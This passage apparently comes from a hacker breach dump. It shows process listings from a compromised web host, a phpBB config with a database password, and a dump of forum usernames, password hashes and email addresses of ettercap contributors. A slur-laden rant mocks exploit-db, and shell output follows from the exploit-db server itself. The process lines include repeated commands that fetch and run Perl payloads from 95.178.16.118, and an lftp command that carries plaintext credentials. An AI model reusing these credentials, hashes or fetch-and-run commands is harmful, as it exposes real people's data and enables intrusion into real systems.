  2299. root       239  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/2]
  2300. root       240  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/3]
  2301. root       241  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/4]
  2302. root       242  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/5]
  2303. root       243  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/6]
  2304. root       244  0.0  0.0      0     0 ?        S<   Sep28   0:00 [cqueue/7]
  2305. root       247  0.0  0.0      0     0 ?        S<   Sep28   0:00 [khubd]
  2306. root       249  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kseriod]
  2307. root       364  0.0  0.0      0     0 ?        S    Sep28   0:00 [khungtaskd]
  2308. root       367  0.0  0.0      0     0 ?        S<   Sep28  29:37 [kswapd0]
  2309. root       368  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/0]
  2310. root       369  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/1]
  2311. root       370  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/2]
  2312. root       371  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/3]
  2313. root       372  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/4]
  2314. root       373  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/5]
  2315. root       374  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/6]
  2316. root       375  0.0  0.0      0     0 ?        S<   Sep28   0:00 [aio/7]
  2317. root       539  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kpsmoused]
  2318. root       618  0.0  0.0      0     0 ?        S<   Sep28   0:00 [scsi_eh_0]
  2319. root       637  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/0]
  2320. root       638  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/1]
  2321. root       639  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/2]
  2322. root       640  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/3]
  2323. root       641  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/4]
  2324. root       642  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/5]
  2325. root       643  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/6]
  2326. root       644  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata/7]
  2327. root       645  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ata_aux]
  2328. root       664  0.0  0.0      0     0 ?        S<   Sep28   0:00 [scsi_eh_1]
  2329. root       665  0.0  0.0      0     0 ?        S<   Sep28   5:14 [usb-storage]
  2330. root       667  0.0  0.0      0     0 ?        S<   Sep28   0:00 [scsi_eh_2]
  2331. root       668  0.0  0.0      0     0 ?        S<   Sep28   1:45 [usb-storage]
  2332. root       679  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kstriped]
  2333. root       716  0.0  0.0      0     0 ?        S<   Sep28   0:00 [ksnapd]
  2334. root       755  0.0  0.0      0     0 ?        S<   Sep28  30:00 [kjournald]
  2335. root       780  0.0  0.0      0     0 ?        S<   Sep28   0:02 [kauditd]
  2336. root       813  0.0  0.0  12764   168 ?        S<s  Sep28   0:00 /sbin/udevd -d
  2337. root      1571  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kedac]
  2338. root      2416  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/0]
  2339. root      2417  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/1]
  2340. root      2418  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/2]
  2341. root      2419  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/3]
  2342. root      2420  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/4]
  2343. root      2421  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/5]
  2344. root      2422  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/6]
  2345. root      2423  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpathd/7]
  2346. root      2424  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kmpath_handlerd]
  2347. root      2448  0.0  0.0      0     0 ?        S<   Sep28   0:00 [kjournald]
  2348. root      2931  0.0  0.0      0     0 ?        S<   Sep28   0:00 [bond0]
  2349. root      3221  0.0  0.0  92864   476 ?        S<sl Sep28   2:13 auditd
  2350. root      3223  0.0  0.0  81804   292 ?        S<sl Sep28   2:33 /sbin/audispd
  2351. root      3253  0.0  0.0   5912   308 ?        Ss   Sep28   1:09 syslogd -m 0
  2352. root      3256  0.0  0.0   3808   196 ?        Ss   Sep28   0:15 klogd -x
  2353. root      3270  0.0  0.0  10764   280 ?        Ss   Sep28   1:06 irqbalance
  2354. named     3307  0.0  0.0 291644  3428 ?        Ssl  Sep28  79:54 /usr/sbin/named -u named
  2355. rpc       3341  0.0  0.0   8056    32 ?        Ss   Sep28   0:00 portmap
  2356. root      3378  0.0  0.0      0     0 ?        S<   Sep28  44:14 [rpciod/0]
  2357. root      3379  0.0  0.0      0     0 ?        S<   Sep28   0:19 [rpciod/1]
  2358. root      3380  0.0  0.0      0     0 ?        S<   Sep28   0:16 [rpciod/2]
  2359. root      3381  0.0  0.0      0     0 ?        S<   Sep28   0:19 [rpciod/3]
  2360. root      3382  0.0  0.0      0     0 ?        S<   Sep28   1:01 [rpciod/4]
  2361. root      3383  0.0  0.0      0     0 ?        S<   Sep28   0:17 [rpciod/5]
  2362. root      3384  0.0  0.0      0     0 ?        S<   Sep28   0:16 [rpciod/6]
  2363. root      3385  0.0  0.0      0     0 ?        S<   Sep28   0:18 [rpciod/7]
  2364. rpcuser   3398  0.0  0.0  10164   212 ?        Ss   Sep28   0:00 rpc.statd
  2365. root      3421  0.0  0.0  55448     4 ?        Ss   Sep28   0:00 rpc.idmapd
  2366. dbus      3444  0.0  0.0  21260     4 ?        Ss   Sep28   0:00 dbus-daemon --system
  2367. root      3498  0.0  0.0      0     0 ?        S<   Sep28   9:35 [nfsiod]
  2368. root      3499  0.0  0.0      0     0 ?        S    Sep28   0:00 [lockd]
  2369. root      3568  0.0  0.0   3804     4 ?        Ss   Sep28   0:00 /usr/sbin/acpid
  2370. nscd      3589  0.0  0.0 252376   828 ?        Ssl  Sep28  24:19 /usr/sbin/nscd
  2371. root      3630  0.0  0.0  67656   332 ?        Ss   Sep28   0:48 /usr/sbin/sshd
  2372. root      3647  0.0  0.0  22072   412 ?        Ss   Sep28   1:15 xinetd -stayalive -pidfile /var/run/xinetd.pid
  2373. ntp       3667  0.0  0.0  23820  5452 ?        SLs  Sep28   0:31 ntpd -u ntp:ntp -p /var/run/ntpd.pid
  2374. exim      3686  0.0  0.0  80572   580 ?        Ss   Sep28   0:35 /usr/sbin/exim -bd -q1h
  2375. root      3824  0.0  0.0  72920   488 ?        Ss   Sep28   0:36 crond
  2376. root      3839  0.0  0.0  95052  3052 ?        Ss   Sep28   0:36 /usr/sbin/munin-node
  2377. root      4211  0.0  0.0  69544     4 ?        Ssl  Oct13   0:00 sfcbd -d
  2378. root      4213  0.0  0.0  59300     4 ?        S    Oct13   0:00 sfcbd -d
  2379. root      4214  0.0  0.0  71740     4 ?        S    Oct13   0:00 sfcbd -d
  2380. root      4274  0.0  0.0 159036  3408 ?        Sl   Oct13   5:06 /usr/sbin/snmpd -LSnd -Lf /dev/null -p /var/run/snmpd.pid -a -c /etc/snmp/snmpd.sfinc-utils.conf
  2381. root      4303  0.0  0.0  61380     4 ?        S    Oct13   0:00 sfcbd -d
  2382. root      4417  0.0  0.0      0     0 ?        S    Nov24   0:12 [pdflush]
  2383. root      4565  0.0  0.0 279692  2792 ?        Ssl  Oct13   8:44 /opt/dell/srvadmin/sbin/dsm_sa_datamgrd
  2384. root      4568  0.0  0.0  61360     4 ?        S    Oct13   0:00 sfcbd -d
  2385. root      4571  0.0  0.0  73688     4 ?        S    Oct13   0:00 sfcbd -d
  2386. root      4864  0.0  0.0 174704   528 ?        Ssl  Oct13   0:36 /opt/dell/srvadmin/sbin/dsm_sa_eventmgrd
  2387. root      4925  0.0  0.0 254748  2084 ?        Ssl  Oct13  15:43 /opt/dell/srvadmin/sbin/dsm_sa_snmpd
  2388. avahi     5106  0.0  0.0  21612   532 ?        Ss   Sep28   0:00 avahi-daemon: running [sfp-web-9.local]
  2389. avahi     5107  0.0  0.0  21480   200 ?        Ss   Sep28   0:00 avahi-daemon: chroot helper
  2390. 68        5156  0.0  0.0  29540  1216 ?        Ss   Sep28   0:52 hald
  2391. root      5157  0.0  0.0  21700   448 ?        S    Sep28   0:00 hald-runner
  2392. 68        5188  0.0  0.0  10656   484 ?        S    Sep28   0:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
  2393. 68        5200  0.0  0.0  10660   480 ?        S    Sep28   0:00 hald-addon-keyboard: listening on /dev/input/event0
  2394. root      5208  0.0  0.0  10232   432 ?        S    Sep28   4:39 hald-addon-storage: polling /dev/scd0
  2395. root      5213  0.0  0.0  10232   432 ?        S    Sep28   1:13 hald-addon-storage: polling /dev/hda
  2396. root      5215  0.0  0.0  10232   440 ?        S    Sep28   1:07 hald-addon-storage: polling /dev/sdb
  2397. root      5245  0.0  0.0  35904   240 ?        S    Sep28   0:00 /usr/sbin/osirisd -r /var/lib/osiris
  2398. osiris    5246  0.0  0.0  36116   748 ?        S    Sep28   0:00 /usr/sbin/osirisd -r /var/lib/osiris
  2399. root      5249  0.0  0.0   3796   436 tty1     Ss+  Sep28   0:00 /sbin/mingetty tty1
  2400. root      5250  0.0  0.0   3796   436 tty2     Ss+  Sep28   0:00 /sbin/mingetty tty2
  2401. root      5251  0.0  0.0   3796   436 tty3     Ss+  Sep28   0:00 /sbin/mingetty tty3
  2402. root      5252  0.0  0.0   3796   436 tty4     Ss+  Sep28   0:00 /sbin/mingetty tty4
  2403. root      5254  0.0  0.0   3796   436 tty5     Ss+  Sep28   0:00 /sbin/mingetty tty5
  2404. root      5256  0.0  0.0   3796   436 tty6     Ss+  Sep28   0:00 /sbin/mingetty tty6
  2405. apache    5767  0.0  0.0   8704   828 ?        S    Nov18   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2406. apache    5769  0.0  0.0  58608  1508 ?        S    Nov18   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2407. apache    8772  0.0  0.4 395468 38516 ?        S    Nov23   0:02 /usr/sbin/httpd
  2408. apache    9928  0.0  0.4 393956 39732 ?        S    Nov24   0:05 /usr/sbin/httpd
  2409. root     10444  0.0  0.0 316928  6416 ?        Ss   Nov16   0:27 /usr/sbin/httpd
  2410. root     10445  0.0  0.0   3852   504 ?        S    Nov16   1:57 /usr/sbin/cronolog --symlink=/var/local/log/error_log /var/local/log/%Y/%m/%d/error.log
  2411. root     10447  0.0  0.0   3848   440 ?        S    Nov16   1:23 /usr/sbin/cronolog --symlink=/var/local/log/vhost_log /var/local/log/%Y/%m/%d/vhost_log
  2412. root     10448  0.0  0.0   3848   460 ?        S    Nov16   5:50 /usr/sbin/cronolog --symlink=/var/local/log/access_log /var/local/log/%Y/%m/%d/access_log
  2413. root     10449  0.0  0.0   3856   440 ?        S    Nov16   0:03 /usr/sbin/cronolog --symlink=/var/local/log/developerweb_log /var/local/log/%Y/%m/%d/developerweb_log
  2414. root     10450  0.0  0.2 125312 18580 ?        Sl   Nov16  10:28 /usr/bin/perl -w /var/local/mastertree/host/sfp-web/scripts/vhost_rewriter
  2415. apache   10865  0.0  0.3 390016 25028 ?        S    Nov24   0:01 /usr/sbin/httpd
  2416. apache   11814  0.0  0.0   8704  1016 ?        S    Nov24   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2417. apache   11816  0.0  0.0  58608  2620 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2418. apache   12188  0.0  0.0   8704   980 ?        S    Nov24   0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod  x b;perl b;cd /tmp;rm -rf *;
  2419. apache   12189  0.0  0.0  58616  2624 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/b";
  2420. root     12523  0.0  0.0  56648   392 ?        Ss   Nov04   0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf
  2421. nginx    12524  0.2  0.0  57388  1500 ?        S    Nov04  68:37 nginx: worker process                  
  2422. nginx    12525  0.1  0.0  57764  1840 ?        S    Nov04  59:01 nginx: worker process                  
  2423. nginx    12526  0.2  0.0  57456  1520 ?        S    Nov04  64:31 nginx: worker process                  
  2424. nginx    12527  0.2  0.0  58160  2404 ?        S    Nov04  63:14 nginx: worker process                  
  2425. nginx    12528  0.1  0.0  57788  1780 ?        S    Nov04  47:43 nginx: worker process                  
  2426. nginx    12529  0.1  0.0  57720  1792 ?        S    Nov04  48:26 nginx: worker process                  
  2427. nginx    12530  0.2  0.0  57584  1620 ?        S    Nov04  61:50 nginx: worker process                  
  2428. nginx    12531  0.2  0.0  57856  1884 ?        S    Nov04  64:09 nginx: worker process                  
  2429. apache   13296  0.7  0.5 411004 46200 ?        S    12:18   0:04 /usr/sbin/httpd
  2430. apache   13709  0.0  0.5 403000 42372 ?        S    Nov24   0:06 /usr/sbin/httpd
  2431. rtstats  15645  1.6  0.1 179260 10884 ?        S    Nov16 221:11 /usr/bin/python /var/local/stats/rtstats/datasources/prweb.py --daemonize --tail --pidfile /var/run/rtstats/prweb.pid --infolog /var/log/rtstats/datasource-prweb.log --configfile /var/local/config/rtstats/datasources/prweb.cfg --configfile /var/local/stats/rtstats.cfg
  2432. apache   16268  0.0  0.0  60804  1508 ?        S    Nov19   0:00 lftp -u GFS,87dbcvwx15s4f56ds54f perfo-lehavre.no-ip.org -p 146 -e lcd "/home/groups/f/fl/florianrobinet/htdocs/GFS/Archives"; mirror -s -R --Remove-source-files; exit
  2433. apache   17814  0.0  0.0   8704  1040 ?        S    Nov24   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2434. apache   17818  0.0  0.0  58608  2620 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2435. apache   18478  0.0  0.3 391904 28156 ?        S    03:26   0:13 /usr/sbin/httpd
  2436. apache   18960  2.8  0.5 398652 45604 ?        S    12:25   0:05 /usr/sbin/httpd
  2437. apache   19043  2.5  0.4 398116 33464 ?        S    12:25   0:05 /usr/sbin/httpd
  2438. apache   19055  4.9  0.5 405644 41216 ?        S    12:25   0:09 /usr/sbin/httpd
  2439. apache   19056  2.9  0.4 402072 37836 ?        S    12:25   0:05 /usr/sbin/httpd
  2440. apache   19077  2.5  0.4 399132 35544 ?        S    12:25   0:04 /usr/sbin/httpd
  2441. apache   19093  3.0  0.4 397244 34216 ?        S    12:25   0:05 /usr/sbin/httpd
  2442. apache   19094  3.1  0.5 398832 43744 ?        S    12:25   0:05 /usr/sbin/httpd
  2443. apache   19741  0.0  0.0   8704  1028 ?        S    03:29   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2444. apache   19745  0.0  0.0  58608  2616 ?        S    03:29   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2445. apache   19789  2.0  0.4 394212 36988 ?        S    12:27   0:02 /usr/sbin/httpd
  2446. apache   19903  2.4  0.4 396360 37188 ?        S    12:27   0:02 /usr/sbin/httpd
  2447. apache   19945  2.7  0.3 395120 30760 ?        S    12:27   0:02 /usr/sbin/httpd
  2448. apache   20138  3.1  0.3 395072 30492 ?        S    12:27   0:02 /usr/sbin/httpd
  2449. apache   20203  2.0  0.4 394404 35928 ?        S    12:27   0:01 /usr/sbin/httpd
  2450. apache   20274  3.0  0.3 397052 30000 ?        S    12:27   0:02 /usr/sbin/httpd
  2451. apache   20434  0.0  0.3 401880 29916 ?        S    Nov24   0:28 /usr/sbin/httpd
  2452. apache   20439  2.5  0.3 393252 30576 ?        S    12:28   0:01 /usr/sbin/httpd
  2453. apache   22124  0.0  0.4 401232 34788 ?        S    Nov24   0:05 /usr/sbin/httpd
  2454. apache   23720  0.0  0.0   8704  1008 ?        S    Nov24   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2455. apache   23722  0.0  0.0  58608  2620 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2456. apache   24614  0.0  0.0   8704  1020 ?        S    Nov24   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2457. apache   24616  0.0  0.0  58608  2624 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2458. apache   24714  0.0  0.1 377988 12680 ?        S    Nov24   0:00 /usr/sbin/httpd
  2459. apache   24719  0.0  0.0   8704   980 ?        S    Nov24   0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod  x b;perl b;cd /tmp;rm -rf *;
  2460. apache   24720  0.0  0.0  58616  2624 ?        S    Nov24   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/b";
  2461. apache   25971  0.0  0.0   8704   828 ?        S    Nov21   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2462. apache   25974  0.0  0.0  58608  1512 ?        S    Nov21   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2463. root     27631  0.0  0.0      0     0 ?        S    Nov23   0:00 [pdflush]
  2464. apache   31023  0.0  0.1 399148  8908 ?        S    Nov23   0:04 /usr/sbin/httpd
  2465. apache   31873  0.0  0.3 388288 25512 ?        S    01:48   0:01 /usr/sbin/httpd
  2466. apache   32062  0.0  0.0   8704  1064 ?        S    01:48   0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
  2467. apache   32067  0.0  0.0  58608  2620 ?        S    01:48   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/scax.txt";
  2468. apache   32288  0.0  0.0   8704   820 ?        S    Nov23   0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod  x b;perl b;cd /tmp;rm -rf *;
  2469. apache   32289  0.0  0.0  58608  1508 ?        S    Nov23   0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16;  get1  "http://95.178.16.118/b";
  2470.  
  2471. $ w
  2472.  12:28:48 up 30 days, 40 min,  1 user,  load average: 0.65, 0.64, 0.66
  2473. USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
  2474. root     pts/0    sec-sog-2.v99.ch 04:17    8:03m  0.11s  0.11s -bash
  2475.  
  2476. $ ls -lah /home/groups/e/et/ettercap/htdocs/
  2477. total 2.7M
  2478. drwxrwsr-x  8 dummy 18435 2.0K Oct 18  2009 .
  2479. drwxrws--x  5 dummy 18435 1.0K Sep 17  2008 ..
  2480. -rw-r--r--  1 42100 18435 2.2K Dec 21  2004 authors.php
  2481. drwxr-xr-x  2 42100 18435 2.0K Aug  9  2008 devel
  2482. -rw-r--r--  1 42100 18435 1.6K Apr 15  2004 download.php
  2483. -rw-r--r--  1 42100 18435 2.7K Apr 24  2004 fingerprint.php
  2484. drwx--x--x 10 42100 18435 2.0K Oct 18  2009 forum
  2485. -rw-r--r--  1 42100 18435 2.2K Apr 15  2004 history.php
  2486. drwxr-xr-x  3 42100 18435 1.0K Aug  9  2008 images
  2487. drwxr-xr-x  2 42100 18435 1.0K Aug  9  2008 includes
  2488. -rw-r--r--  1 42100 18435 4.6K Sep 23  2004 index.php
  2489. -rw-r--r--  1 42100 18435  768 Apr 15  2004 latest.php
  2490. -rw-r--rw-  1 42100 18435    5 Aug 15  2005 latest.stat
  2491. -rw-r--r--  1 42100 18435  886 Apr 15  2004 news.php
  2492. -rw-r--r--  1 42100 18435 5.3K Nov 13  2003 news.txt
  2493. -rw-r--r--  1 42100 18435 2.3M Oct 18  2009 phpBB-3.0.5.zip
  2494. drwxr-xr-x 13 42100 18435 2.0K Oct 18  2009 phpBB3
  2495. -rw-r--r--  1 42100 18435  743 Apr 15  2004 plugins.php
  2496. -rw-r--r--  1 42100 18435  914 May  6  2003 plugins.txt
  2497. drwxr-xr-x  2 42100 18435 2.0K Aug  9  2008 release
  2498. -rw-r--r--  1 42100 18435 3.7K Apr 15  2004 screenshots.php
  2499. -rw-r--r--  1 42100 18435 1019 Apr 15  2004 search.php
  2500. -rw-r--r--  1 42100 18435 1.8K Apr 15  2004 stuff.php
  2501. -rw-r--r--  1 42100 18435 1.5K Jan 25  2001 style.css
  2502. -rw-r--rw-  1 42100 18435 3.0K Aug 15  2005 submitted.fingers.txt
  2503. -rw-r--r--  1 42100 18435  12K Jun 24  2005 updateNG.data
  2504. -rw-rw-rw-  1 42100 18435 230K Aug 15  2005 updateNG.log
  2505. -rw-r--r--  1 42100 18435 2.0K Nov  9  2005 updateNG.php
  2506. -rwxr-xr-x  1 42100 18435  201 Jul 13  2003 updateNG.sh
  2507.  
  2508. $ cat /home/groups/e/et/ettercap/htdocs/updateNG.sh
  2509. #!/bin/sh
  2510.  
  2511. wget http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/ettercap/ettercap_ng/share/ -O updateNG.data
  2512. chmod 644 updateNG.data
  2513. scp updateNG.data alor@ettercap.sf.net:ettercap
  2514. rm -f updateNG.data
  2515.  
  2516. $ cat /home/groups/e/et/ettercap/htdocs/forum/config.php
  2517. <?php
  2518.  
  2519. //
  2520. // phpBB 2.x auto-generated config file
  2521. // Do not change anything in this file!
  2522. //
  2523.  
  2524. $dbms = "mysql";
  2525.  
  2526. $dbhost = "mysql4-e";
  2527. $dbname = "e17435_etterforum";
  2528. $dbuser = "e17435admin";
  2529. $dbpasswd = "ettersql_a";
  2530.  
  2531. $table_prefix = "phpbb_";
  2532.  
  2533. define('PHPBB_INSTALLED', true);
  2534.  
  2535. define('DEBUG', true);
  2536.  
  2537. ?>
  2538.  
  2539. $ SELECT phpbb_users.username, phpbb_users.user_password, phpbb_users.user_email,
  2540. phpbb_ranks.rank_title FROM phpbb_users LEFT JOIN phpbb_ranks ON user_rank = rank
  2541. id WHERE user_rank > 0 ORDER BY user_rank
  2542. NaGA:256ce2d528caee146c82f20a3378673f:naga@antifork.org:Ettercap Developer
  2543. ares:9c05a83765c4aad064d737496dae2dee:ares@inwind.it:Supporter
  2544. metaldemon:3ef4f11188954e64884037cae7c3e963:metaldemon@tiscalinet.it:Supporter
  2545. ttyp1:3c5e778f14dee668c0a9560fb8a6ced2:yokel4@anonymous.to:Betatester
  2546. drygol:c8214d5d4d4eb4b45d2bca063c07dd6a:pandrychowski@lpp.com.pl:Betatester
  2547. Gumble:ce7bcda695c30aa2f9e5f390c820d985:dukegumble@redseven.de:Betatester
  2548. Acelent:817b61c60959294d4250912f816f9451:acelent@gmail.com:Betatester
  2549. Jammer:a13f5ed8c46f26076c20fd4829901bc8:jammer@mauigateway.com:Betatester
  2550. m|n|moE:de9cb5d4ae42da6b8eb6623c322fa200:minimoe@home.se:Betatester
  2551. Crusher4:2df66ae5eb0807dd2b84933adf3c4981:Crusher4@mac.com:Betatester
  2552. MathieuMa:f8c22494a40f2c034aa73b891135da85:math.m@promac.org:Betatester
  2553. Mapes:3e1bbf17e6528381ae1e1e596733fb9a:bellizzi@pacbell.net:Betatester
  2554. garaged:3c2234a7ce973bc1700e0c743d6a819c:maxvaldez@yahoo.com:Betatester
  2555. Piw:a980baafb7bdb3d71aec6fc3776323ac:piw69@rpg.pl:Betatester
  2556. mod7:e40fbc4015c12f4c97e5e65b38127a96:ghy7765@yahoo.com:Betatester
  2557. stromax:274216f1c8423d3bad9cc3f684e31ffa:thomas@limone.ch:Betatester
  2558. DigitalDust:e80eded141e1295d694cd35cf2b8f675:jason@evilroot.net:Betatester
  2559. cableguy:37430a92973d1adca9934f0a5ecc53d2:cableguy@iname.com:Betatester
  2560. Suntac:9e220ad44ce3cae2c5dd5a6a6e770837:Suntac@dds.nl:Betatester
  2561. SGResu:0d736aad1ff5a82ca580e7980f2de88d:sgresu@hotmail.com:joker
  2562. LnZ:292b804c2895989cebef7340971d1e8d:lporro@libero.it:fac totum
  2563. megabug:74b468fafab62ade90622085691026dd:megabug@xerxes.stru.polimi.it:
  2564. Zero_Chaos:7b24afc8bc80e548d66c4e7ff72171c5:sidhayn@hotmail.com:Contributor
  2565. daten:eff1541059e9a263b245657e1805b339:daten@users.sourceforge.net:Contributor
  2566.  
  2567.  
  2568.  ____________________________________________________|_._._._._._._._,
  2569.  \___________________________________________________|_|_|_|_|_|_|_|_|
  2570.                                                      ! ~ exploit-db ~
  2571.                                                                      
  2572. Now we come to a different topic. A topic about people who  leech  off
  2573. what the scene creates  and  call  it  their  own.  About  people  who
  2574. copyright ideas and papers about security  related  topics  that  have
  2575. been around for years. How many  XSS-Papers  are  there  currently  on
  2576. exploit-db? How many retarded strcpy(buf,  argv[1])-papers  are  being
  2577. written over and over  again?  About  whitehats  who  think  releasing
  2578. exploits would make the world much more safe.  And  because  of  fame.
  2579. They all want fame so badly that they do anything  and  everything  in
  2580. order to be part of the security industry. What's even more  hilarious
  2581. is that these "famous" security people keep  getting  owned.  We  mean
  2582. el8, phc, h0no, and zf0  have  all  owned  these  "Security  Rockstar"
  2583. faggots and yet, nothing changes. Or the attacks  are  categorized  as
  2584. "skiddy" behavior. It's rediculous how terrible the industry is. There
  2585. is no accountability anymore.                                        
  2586.                                                                      
  2587. Still there are some lame skids that need a good spanking.  Stupid  10
  2588. year olds who take perl-exploits to destroy  clan-pages  for  fun  and
  2589. call  themselves  "hackers"  without  knowing  what  they  are  doing.
  2590. Criminals who take exploits to  steal  payment  stuff  for  their  own
  2591. selfish financial gain. And  to  get  their  friends  thrown  in  jail
  2592. (soup). Fame and money... Get the message?                            
  2593.  
  2594. $ uname -a
  2595. Linux www 2.6.32-25-server #45-Ubuntu SMP Sat Oct 16 20:06:58 UTC 2010 x86_64 GNU/Linux
  2596.  
  2597. $ id
  2598. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  2599.  
  2600. $ pwd
  2601. /var/www
  2602.  
  2603. $ ls -la
  2604. total 24180
  2605. drwxr-xr-x 18 www-data www-data     4096 Nov 26 10:16 .
  2606. drwxr-xr-x 19 root     root         4096 Sep 24 09:26 ..
  2607. -rw-r--r--  1 www-data www-data     1005 Nov 12 19:03 .htaccess
  2608. -rw-r--r--  1 www-data www-data      764 Nov  5 17:32 .htaccess.save
  2609. -rw-r--r--  1 www-data www-data  2820676 Nov 15 14:26 1920x1200_edb-wallpaper.png
  2610. drwxr-xr-x  4 www-data www-data     4096 Nov 11 07:43 92384723987239847239847234982734
  2611. -rw-r--r--  1 www-data www-data    46149 Nov 11 17:04 apc123456.php
  2612. -rw-r--r--  1 www-data www-data 10723590 Nov 28 06:52 archive.tar.bz2
  2613. -rw-r--r--  1 www-data www-data    18851 Jul  9 14:42 disclosure.html
  2614. -rw-r--r--  1 www-data www-data    11662 Nov 11 11:42 dorkorinos.txt
  2615. drwxr-xr-x  2 www-data www-data     4096 Jul  9 14:42 edbpartners
  2616. -rw-r--r--  1 www-data www-data     1406 Jul  9 14:53 favicon.ico
  2617. -rw-r--r--  1 www-data www-data     1921 Jul  9 14:42 feature.txt
  2618. -rw-r--r--  1 www-data www-data     1923 Jul 11 16:01 feature1.txt
  2619. drwxr-xr-x 21 www-data www-data     4096 Nov 22 20:06 forums
  2620. drwxr-xr-x  2 www-data www-data     4096 Sep 23 06:41 funny404
  2621. -rw-r--r--  1 www-data www-data     1119 Nov 22 07:45 gd_rss.php
  2622. -rw-r--r--  1 www-data www-data       65 Aug 26 04:53 goaway.php
  2623. -rw-r--r--  1 www-data www-data       53 Jul  9 14:42 googled6c4817aa45e0032.html
  2624. -rw-r--r--  1 www-data www-data        5 Nov 11 07:24 hola.txt
  2625. -rw-r--r--  1 www-data www-data  3154634 Nov 11 07:25 hola.xml
  2626. drwxr-xr-x 15 www-data www-data     4096 Nov 22 15:50 images
  2627. -rw-r--r--  1 www-data www-data      397 Aug 26 04:53 index.php
  2628. drwxr-xr-x  2 www-data www-data     4096 Nov  4 12:20 leetdownloads
  2629. -rw-r--r--  1 www-data www-data      311 Nov 12 18:40 maintenance.php
  2630. drwxr-xr-x  2 root     root         4096 Nov 26 10:18 movies
  2631. -rw-r--r--  1 www-data www-data      106 Aug 26 04:53 news.php
  2632. drwxr-xr-x  2 www-data www-data     4096 Nov 11 17:20 nginx-default
  2633. -rw-r--r--  1 www-data www-data      220 Oct 30 17:00 pagerank.html
  2634. -rw-r--r--  1 www-data www-data      761 Sep  6 06:12 rating.txt
  2635. -rw-r--r--  1 www-data www-data     9122 Aug 18 05:32 readme.html
  2636. -rw-r--r--  1 www-data www-data       47 Jul  9 14:53 robots_ssl.txt
  2637. -rw-r--r--  1 www-data www-data  4007150 Dec  1 07:47 ror.xml
  2638. -rw-r--r--  1 www-data www-data     2102 Sep  1 05:40 rss.php
